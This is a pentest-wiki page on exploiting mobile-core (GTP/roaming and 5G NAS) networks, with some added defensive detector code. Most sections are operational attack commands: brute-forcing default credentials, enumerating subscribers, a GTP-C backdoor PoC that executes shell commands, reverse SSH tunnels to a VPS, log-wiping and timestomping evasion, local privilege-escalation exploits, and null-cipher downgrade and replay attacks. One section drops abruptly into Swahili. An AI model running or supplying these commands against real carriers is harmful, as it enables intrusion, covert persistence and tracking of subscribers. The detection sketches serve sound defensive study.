# Telecom Network Exploitation (GTP / Roaming Environments)
{{#include ../../banners/hacktricks-training.md}}
> [!NOTE]
> Mobile-core protocols (GPRS Tunnelling Protocol – GTP) often traverse semi-trusted GRX/IPX roaming backbones. Because they run over plain UDP with almost no authentication, any foothold inside a telecom perimeter can usually reach the core signalling planes directly. The notes below collect attack techniques observed in the wild against SGSN/GGSN, PGW/SGW and other EPC nodes.
## 1. Recon & Initial Access

### 1.1 Default OSS / NE Accounts

A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … A dedicated wordlist dramatically increases brute-force success:

```bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
```

If the device only exposes a management VRF, pivot through a jump host first (see the «SGSN Emu Tunnel» section below).
1.2 Ugundaji wa Host ndani ya GRX/IPX
Wengi wa operatori wa GRX bado wanaruhusu ICMP echo kupita kwenye backbone. Changanya masscan
na probes za UDP zilizojengwa gtpv1
ili kwa haraka ramani ya GTP-C listeners:
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
## 2. Subscriber enumeration – cordscan

This Go tool crafts GTP-C Create PDP Context Request packets and records the responses. Each response reveals the SGSN/MME currently serving the queried IMSI and, sometimes, the PLMN the subscriber is visiting.

```bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
```

Key flags:

- `--imsi` Target subscriber IMSI
- `--oper` Home / HNI (MCC+MNC)
- `-w` Write raw packets to pcap

Key constants inside the binary can be patched to widen the scan:

```go
pingtimeout = 3 // seconds before giving up
pco = 0x218080
common_tcp_ports = "22,23,80,443,8080"
```
## 3. Code execution over GTP – GTPDoor

`GTPDoor` is a small ELF service that binds UDP 2123 and parses every incoming GTP-C packet. When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via `/bin/sh -c`. stdout/stderr are exfiltrated inside Echo Response messages, so no outbound session is ever created.
Minimal PoC packet (Python):

```python
from Crypto.Cipher import AES  # pycryptodome
import gtpc                    # helper module assumed by the original PoC (not a public library)

key = b"SixteenByteKey!!"      # AES-128 needs exactly 16 bytes; the original 15-byte key would raise
cmd = b"id;uname -a"
# Zero IV and NUL padding up to 32 bytes, as in the original PoC
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16).encrypt(cmd.ljust(32, b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
```
Detection:

- any host sending unbalanced Echo Requests to SGSN IP addresses
- GTP version flag set to 1 while message type = 1 (Echo) – deviation from spec
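The detection ideas above (and the GTP-related items in the "Detection Ideas" section at the end of the page) can be turned into a small analyser. This is an added example, not code from the page, from GTPDoor or from any tool it describes: it decodes the GTPv1-C header (TS 29.060: flags octet with version/PT/E/S/PN bits, message type, length, TEID, then the optional sequence number / N-PDU number / next-extension octets when any of E, S or PN is set) for a few packets constructed inline, and flags Echo Requests carrying a payload (an Echo Request has no mandatory IEs, so a large body is where an implant hides data), Echo messages with a non-zero TEID (the spec requires 0), hosts whose Echo Requests go unanswered, and Create PDP Context Requests from hosts outside an assumed SGSN allow-list. The IP addresses, the allow-list and the thresholds are assumptions.

```python
"""Detection sketch for anomalous GTP-C traffic on UDP 2123 (added example)."""
import struct
from collections import defaultdict

ECHO_REQUEST, ECHO_RESPONSE, CREATE_PDP_CONTEXT_REQUEST = 1, 2, 16


def parse_gtpv1(data: bytes) -> dict:
    """Decode the GTPv1 header and return its fields plus the message body."""
    if len(data) < 8:
        raise ValueError("short GTP header")
    flags, msg_type, length, teid = struct.unpack("!BBHI", data[:8])
    version = flags >> 5
    pt = (flags >> 4) & 1
    e, s, pn = (flags >> 2) & 1, (flags >> 1) & 1, flags & 1
    hdr_len, seq = 8, None
    if e or s or pn:
        # If any of E/S/PN is set, all three optional octets groups are present
        if len(data) < 12:
            raise ValueError("short optional header")
        seq = struct.unpack("!H", data[8:10])[0]
        hdr_len = 12
    body = data[hdr_len:8 + length]  # 'length' counts bytes after the first 8
    return {"version": version, "pt": pt, "type": msg_type, "length": length,
            "teid": teid, "seq": seq, "body": body}


def build_gtpv1(msg_type: int, body: bytes = b"", teid: int = 0, seq=None) -> bytes:
    """Helper used only to construct the sample packets below."""
    flags = (1 << 5) | (1 << 4)  # version 1, PT=1 (GTP, not GTP')
    opt = b""
    if seq is not None:
        flags |= 1 << 1          # S bit: sequence number present
        opt = struct.pack("!HBB", seq, 0, 0)
    return struct.pack("!BBHI", flags, msg_type, len(opt) + len(body), teid) + opt + body


def analyse(packets, known_sgsn, max_echo_body=8, unanswered_threshold=3):
    """packets: iterable of (src_ip, dst_ip, raw_bytes). Returns [(host, reason)]."""
    alerts = []
    req_count = defaultdict(int)   # src -> Echo Requests sent
    rsp_count = defaultdict(int)   # dst -> Echo Responses received
    for src, dst, raw in packets:
        try:
            p = parse_gtpv1(raw)
        except ValueError:
            alerts.append((src, "malformed GTP header"))
            continue
        if p["type"] in (ECHO_REQUEST, ECHO_RESPONSE) and p["teid"] != 0:
            alerts.append((src, "echo message with non-zero TEID"))
        if p["type"] == ECHO_REQUEST:
            req_count[src] += 1
            if len(p["body"]) > max_echo_body:
                alerts.append((src, f"echo request with {len(p['body'])}-byte payload"))
        elif p["type"] == ECHO_RESPONSE:
            rsp_count[dst] += 1
        elif p["type"] == CREATE_PDP_CONTEXT_REQUEST and src not in known_sgsn:
            alerts.append((src, "Create PDP Context Request from non-SGSN host"))
    for host, n in req_count.items():
        missing = n - rsp_count.get(host, 0)
        if missing >= unanswered_threshold:
            alerts.append((host, f"{missing} unanswered echo requests"))
    return alerts


# Constructed sample: a legitimate SGSN<->GGSN echo pair, then a suspicious host
KNOWN_SGSN = {"10.1.1.10"}
SAMPLE_PACKETS = [
    ("10.1.1.10", "10.1.1.100", build_gtpv1(ECHO_REQUEST, seq=1)),
    ("10.1.1.100", "10.1.1.10", build_gtpv1(ECHO_RESPONSE, b"\x0e\x01", seq=1)),  # Recovery IE
    ("10.9.9.9", "10.1.1.100", build_gtpv1(ECHO_REQUEST, b"MAG1C" + b"\x00" * 32, seq=7)),
    ("10.9.9.9", "10.1.1.100", build_gtpv1(ECHO_REQUEST, b"MAG1C" + b"\x00" * 32, seq=8)),
    ("10.9.9.9", "10.1.1.100", build_gtpv1(ECHO_REQUEST, b"MAG1C" + b"\x00" * 32, seq=9)),
    ("10.9.9.9", "10.1.1.100", build_gtpv1(ECHO_REQUEST, teid=0x1234, seq=11)),
    ("10.9.9.9", "10.1.1.100", build_gtpv1(CREATE_PDP_CONTEXT_REQUEST, b"\x00" * 20, seq=12)),
]

if __name__ == "__main__":
    for host, reason in analyse(SAMPLE_PACKETS, KNOWN_SGSN):
        print(f"{host}: {reason}")
```

In production the packet tuples would come from a pcap or a span port on the GTP-C VLAN; the thresholds should be tuned to the normal echo cadence (typically one request per T3-RESPONSE interval per peer), and the allow-list of SGSN/MME addresses taken from the roaming peer inventory.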
## 4. Pivoting Through the Core

### 4.1 sgsnemu + SOCKS5

`OsmoGGSN` ships with an SGSN emulator able to establish a PDP context towards a real GGSN/PGW. Once negotiated, Linux receives a new `tun0` interface reachable from the roaming peer.

```bash
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
        -APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &    # internal SOCKS proxy
```

With correct firewall hair-pinning, this tunnel bypasses the signalling-only VLANs and lands you directly in the data plane.

### 4.2 SSH Reverse Tunnel over Port 53

DNS is almost always open in roaming infrastructures. Expose an internal SSH service on your VPS listening on :53 and come back later from home:

```bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
```

Make sure `GatewayPorts yes` is enabled on the VPS.
## 5. Covert Channels

| Channel | Transport | Decoding | Notes |
|---|---|---|---|
| ICMP – EchoBackdoor | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | fully passive listener, no outbound traffic |
| DNS – NoDepDNS | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | watches the `*.nodep` sub-domain |
| GTP – GTPDoor | UDP 2123 | AES-128-CBC blob in private IE | blends with legitimate GTP-C chatter |
All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.
## 6. Defense Evasion Cheatsheet

```bash
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
# Disable bash history
export HISTFILE=/dev/null
# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup      # hide from top/htop
printf '\0' > /proc/$$/comm      # appears as [kworker/1]
touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                     # disable SELinux
```
## 7. Privilege Escalation on Legacy NE

```bash
# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
# PwnKit – CVE-2021-4034
python3 PwnKit.py
# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py
```

Cleanup note:

```bash
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c
```
## 8. Tooling

- `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – custom tooling described in the previous sections.
- `FScan`: intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
- `Responder`: LLMNR/NBT-NS rogue WPAD
- `Microsocks` + `ProxyChains`: lightweight SOCKS5 pivoting
- `FRP` (≥0.37): NAT traversal / asset bridging
## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay

5G registration runs over NAS (Non-Access Stratum) on top of NGAP. Until NAS security is activated by Security Mode Command/Complete, the initial messages are neither authenticated nor encrypted. This pre-security window enables several attack paths whenever you can observe or tamper with N2 traffic (e.g., on-path inside the core, a rogue gNB, or a testbed).

Registration flow (abbreviated):

- Registration Request: the UE sends a SUCI (concealed SUPI) and its capabilities.
- Authentication: AMF/AUSF sends RAND/AUTN; the UE returns RES*.
- Security Mode Command/Complete: NAS integrity and ciphering are negotiated and activated.
- PDU Session Establishment: IP/QoS setup.

Lab setup notes (non-RF):

- Core: a default Open5GS deployment is enough to generate the flows.
- UE: a simulator or a test UE; decode with Wireshark.
- Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
- Useful Wireshark display filters:
  - `ngap.procedure_code == 15` (InitialUEMessage)
  - `nas_5g.message_type == 65 or nas-5gs.message_type == 65` (Registration Request)
### 9.1 Identity privacy: SUCI failures exposing SUPI/IMSI

Expected: the UE/USIM must send a SUCI (the SUPI concealed with the home network public key). Finding a plaintext SUPI/IMSI in the Registration Request indicates a privacy flaw that enables persistent subscriber tracking.

How to test:

- Capture the first NAS message inside InitialUEMessage and inspect the Mobile Identity IE.
- Quick checks in Wireshark:
  - It should decode as SUCI, not IMSI.
  - Filter examples: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` should be present; its absence together with the presence of `imsi` indicates a leak.

What to collect:

- MCC/MNC/MSIN if exposed; correlate per UE and track over time/location.

Mitigation:

- Enforce SUCI-only UEs/USIMs; alert on any IMSI/SUPI in initial NAS.
### 9.2 Capability bidding-down to null algorithms (EEA0/EIA0)

Background:

- The UE advertises its supported EEA (encryption) and EIA (integrity) algorithms in the UE Security Capability IE of the Registration Request.
- Common mappings: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 are the null algorithms.

Problem:

- Because the Registration Request is not integrity-protected, an on-path attacker can clear the capability bits to force the selection of EEA0/EIA0 later during Security Mode Command. Some stacks wrongly allow the null algorithms outside emergency services.

Attack steps:

- Intercept the InitialUEMessage and modify the NAS UE Security Capability to advertise only EEA0/EIA0.
- With Sni5Gect, hook the NAS message and patch the capability bits before forwarding.
- Check whether the AMF accepts null ciphering/integrity and completes Security Mode with EEA0/EIA0.

Verification/visibility:

- In Wireshark, confirm the selected algorithms after Security Mode Command/Complete.
- Example passive sniffer output:

```
Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001
```

Mitigations (required):

- Configure the AMF/policy to reject EEA0/EIA0 except where strictly required (e.g., emergency calls).
- Prefer enforcing EEA2/EIA2 as the minimum; log and alarm on any NAS security context negotiating null algorithms.
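The two mitigations above (an AMF policy that refuses the null algorithms, and the UE-side replayed-capability check that TS 33.501 builds into Security Mode Command) are small enough to model end to end. The following is an added example, not code from the page, from Open5GS or from Sni5Gect. The two-octet bit layout it assumes for the UE security capability IE follows TS 24.501 9.11.3.54 as I recall it (octet 1: 5G-EA0..EA7 with EA0 in bit 8; octet 2: 5G-IA0..IA7 likewise); verify it against the spec. The page's EPS-style names EEA/EIA are kept for the algorithm numbers, and the AMF priority list is an assumption.

```python
"""AMF null-algorithm policy and UE replayed-capability check (added example)."""

NULL_ALG = 0
ALG_NAMES = {0: "null", 1: "SNOW3G", 2: "AES", 3: "ZUC"}


class PolicyViolation(Exception):
    """Raised when the only algorithms the UE offers are forbidden by policy."""


def decode_capability(ie: bytes):
    """Return (set of EEA ids, set of EIA ids) advertised in the IE."""
    if len(ie) < 2:
        raise ValueError("UE security capability IE needs at least 2 octets")
    eea = {i for i in range(8) if ie[0] & (0x80 >> i)}
    eia = {i for i in range(8) if ie[1] & (0x80 >> i)}
    return eea, eia


def encode_capability(eea, eia) -> bytes:
    """Inverse of decode_capability; used to build the sample IEs below."""
    return bytes([sum(0x80 >> i for i in eea), sum(0x80 >> i for i in eia)])


def select_algorithms(ue_cap: bytes, amf_priority, emergency=False,
                      allow_null_outside_emergency=False):
    """AMF selection: the highest-priority algorithm the UE also supports.

    Under the strict (default) policy EEA0/EIA0 are eligible only for an
    emergency registration, so a capability advertising nothing but the null
    algorithms is rejected instead of being accepted with EEA0/EIA0.
    allow_null_outside_emergency=True models the misbehaving stacks the text
    mentions.
    """
    eea_set, eia_set = decode_capability(ue_cap)
    null_ok = emergency or allow_null_outside_emergency
    allowed = [a for a in amf_priority if null_ok or a != NULL_ALG]
    eea = next((a for a in allowed if a in eea_set), None)
    eia = next((a for a in allowed if a in eia_set), None)
    if eea is None or eia is None:
        raise PolicyViolation(
            f"UE offers EEA{sorted(eea_set)} / EIA{sorted(eia_set)}; "
            f"no permitted algorithm matches priority {amf_priority}")
    return eea, eia


def rejected_by_policy(ue_cap: bytes, amf_priority, **kw) -> bool:
    """True if the AMF would reject the registration instead of picking null algorithms."""
    try:
        select_algorithms(ue_cap, amf_priority, **kw)
        return False
    except PolicyViolation:
        return True


def ue_verify_replayed_capability(sent: bytes, replayed: bytes) -> bool:
    """UE-side check: Security Mode Command echoes the UE security capability
    under integrity protection; a mismatch with what the UE sent means the
    Registration Request was altered in transit and the SMC must be rejected."""
    return sent == replayed


# Constructed sample: a UE supporting EEA0-3 / EIA0-3, and the same IE after an
# on-path attacker cleared every bit except the null algorithms.
UE_CAP = encode_capability({0, 1, 2, 3}, {0, 1, 2, 3})
TAMPERED_CAP = encode_capability({0}, {0})
AMF_PRIORITY = [2, 1, 3, 0]  # prefer AES, then SNOW3G, ZUC, null last

if __name__ == "__main__":
    eea, eia = select_algorithms(UE_CAP, AMF_PRIORITY)
    print("honest UE   : EEA%d/EIA%d (%s)" % (eea, eia, ALG_NAMES[eea]))
    print("tampered UE : rejected =", rejected_by_policy(TAMPERED_CAP, AMF_PRIORITY))
    print("lenient AMF :", select_algorithms(TAMPERED_CAP, AMF_PRIORITY,
                                              allow_null_outside_emergency=True))
    print("UE detects tampering:", not ue_verify_replayed_capability(UE_CAP, TAMPERED_CAP))
```

The lenient branch reproduces the sniffer output above (EEA0 selected); the strict branch and the replayed-capability comparison are the two independent controls that should both fire when the capability bits have been cleared on the N2 path.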
### 9.3 Replay of the initial Registration Request (pre-security NAS)

Because initial NAS has neither integrity nor freshness, a captured InitialUEMessage + Registration Request can be replayed to the AMF.

PoC rule for 5GReplay to forward matching replays:

```xml
<beginning>
<property value="THEN"
          property_id="101"
          type_property="FORWARD"
          description="Forward InitialUEMessage with Registration Request">
  <!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
  <event value="COMPUTE"
         event_id="1"
         description="Trigger: InitialUEMessage"
         boolean_expression="ngap.procedure_code == 15"/>
  <!-- Context match on NAS Registration Request (message_type == 65) -->
  <event value="COMPUTE"
         event_id="2"
         description="Context: Registration Request"
         boolean_expression="nas_5g.message_type == 65"/>
</property>
</beginning>
```

What to watch:

- Whether the AMF accepts the replay and proceeds to Authentication; a lack of freshness or context checks indicates exposure.

Fixes:

- Enforce replay protection/context binding at the AMF; rate-limit and correlate per gNB/UE.
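The "correlate per gNB/UE" fix above (and the 5G replay item in the "Detection Ideas" section) can be expressed as a windowed detector. This is an added example, not code from the page, from 5GReplay or from Open5GS. It assumes already-dissected records (for instance exported from Wireshark with the filters given earlier) with fields `ts` (seconds), `gnb`, `ran_ue_id` (RAN-UE-NGAP-ID) and `nas` (raw NAS PDU bytes). A retransmission by the same UE arrives under the same NGAP UE association, so the rule only fires when a byte-identical plain Registration Request shows up under two or more different (gnb, ran_ue_id) associations inside the window; the NAS byte strings and timestamps are constructed.

```python
"""Replay detector for InitialUEMessage / Registration Request (added example)."""
import hashlib
from collections import defaultdict, deque

REGISTRATION_REQUEST = 0x41  # 5GMM message type 65


def is_plain_registration_request(nas: bytes) -> bool:
    """EPD 0x7E (5GMM), security header type 0 (plain NAS), message type 0x41."""
    return len(nas) >= 3 and nas[0] == 0x7E and nas[1] == 0x00 and nas[2] == REGISTRATION_REQUEST


class ReplayDetector:
    def __init__(self, window_s=30.0, min_associations=2):
        self.window_s = window_s
        self.min_associations = min_associations
        self._seen = defaultdict(deque)  # sha256(nas) -> deque of (ts, gnb, ran_ue_id)

    def observe(self, rec):
        """Feed one InitialUEMessage record; returns an alert dict or None."""
        if not is_plain_registration_request(rec["nas"]):
            return None
        digest = hashlib.sha256(rec["nas"]).hexdigest()
        q = self._seen[digest]
        q.append((rec["ts"], rec["gnb"], rec["ran_ue_id"]))
        while q and rec["ts"] - q[0][0] > self.window_s:   # drop entries outside the window
            q.popleft()
        associations = {(g, i) for _, g, i in q}
        if len(associations) >= self.min_associations:
            return {"alert": "replayed InitialUEMessage/Registration Request",
                    "nas_sha256": digest[:16],
                    "associations": sorted(associations),
                    "first_seen": q[0][0], "last_seen": rec["ts"]}
        return None


def run(records, **kw):
    """Run one detector over a record list; returns one result per record."""
    det = ReplayDetector(**kw)
    return [det.observe(r) for r in records]


# Constructed NAS PDUs: only the first three octets matter to the detector
NAS_UE_A = bytes.fromhex("7e004179000d0199f907f0ff0000000000000010")
NAS_UE_B = bytes.fromhex("7e004179000d0199f907f0ff0000000000000020")

SAMPLE = [
    {"ts": 0.0,   "gnb": "gnb-1", "ran_ue_id": 1, "nas": NAS_UE_A},  # genuine registration
    {"ts": 5.0,   "gnb": "gnb-1", "ran_ue_id": 1, "nas": NAS_UE_A},  # retransmission, same association
    {"ts": 6.0,   "gnb": "gnb-1", "ran_ue_id": 2, "nas": NAS_UE_A},  # same bytes, new association
    {"ts": 7.0,   "gnb": "gnb-1", "ran_ue_id": 3, "nas": NAS_UE_B},  # a different UE
    {"ts": 100.0, "gnb": "gnb-2", "ran_ue_id": 9, "nas": NAS_UE_A},  # outside the window
]

if __name__ == "__main__":
    for rec, res in zip(SAMPLE, run(SAMPLE)):
        print(rec["ts"], rec["gnb"], rec["ran_ue_id"], "->", res or "ok")
```

Hashing the whole NAS PDU keeps the rule free of any NAS parsing beyond the three header octets; with ECIES-protected SUCIs a genuine new registration produces fresh scheme output and therefore a different hash, which is what makes byte-identical repeats under a new association a strong signal. Widen the window if your AMF keeps NGAP UE contexts alive longer.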
### 9.4 Tooling notes (reproducible)

- Open5GS: bring up AMF/SMF/UPF to emulate the core; observe N2 (NGAP) and NAS.
- Wireshark: verify NGAP/NAS dissection; use the filters above to isolate the Registration.
- 5GReplay: capture a registration, then replay specific NGAP + NAS messages as the rule describes.
- Sni5Gect: sniff/modify/inject NAS control-plane live to force null algorithms or tamper with authentication sequences.

### 9.5 Defensive checklist

- Continuously monitor Registration Requests for plaintext SUPI/IMSI; block offending devices/USIMs.
- Reject EEA0/EIA0 except for narrowly defined emergency procedures; require at least EEA2/EIA2.
- Detect rogue or misconfigured infrastructure: unauthorized gNB/AMF, unexpected N2 peers.
- Alert on NAS security modes that result in null algorithms or on frequent replays of InitialUEMessage.

## Detection Ideas

- Any device other than an SGSN/GGSN crafting Create PDP Context Requests.
- Non-standard ports (53, 80, 443) receiving SSH handshakes from internal IPs.
- Frequent Echo Requests without matching Echo Responses – may indicate GTPDoor beacons.
- High rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields.
- 5G: InitialUEMessage carrying repeated NAS Registration Requests from the same endpoints (replay signal).
- 5G: NAS Security Mode negotiating EEA0/EIA0 outside an emergency context.
## References
- Palo Alto Unit42 – Infiltration of Global Telecom Networks
- 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
- 3GPP TS 29.281 – GTPv2-C (v17.6.0)
- Demystifying 5G Security: Understanding the Registration Protocol
- 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
- 3GPP TS 33.501 – Security architecture and procedures for 5G System
{{#include ../../banners/hacktricks-training.md}}